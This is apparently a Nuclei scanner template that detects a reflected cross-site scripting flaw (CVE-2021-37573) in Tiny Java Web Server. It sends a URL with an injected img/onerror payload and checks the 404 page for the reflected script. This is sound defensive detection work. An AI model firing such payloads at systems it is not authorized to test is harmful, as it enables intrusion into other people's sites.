25 lines
527 B
YAML
25 lines
527 B
YAML
|
id: CVE-2021-37573
|
||
|
|
||
|
info:
|
||
|
name: Tiny Java Web Server Reflected XSS
|
||
|
reference:
|
||
|
- https://seclists.org/fulldisclosure/2021/Aug/13
|
||
|
author: geeknik
|
||
|
severity: medium
|
||
|
tags: cve,cve2021,xss,tjws
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 404
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"
|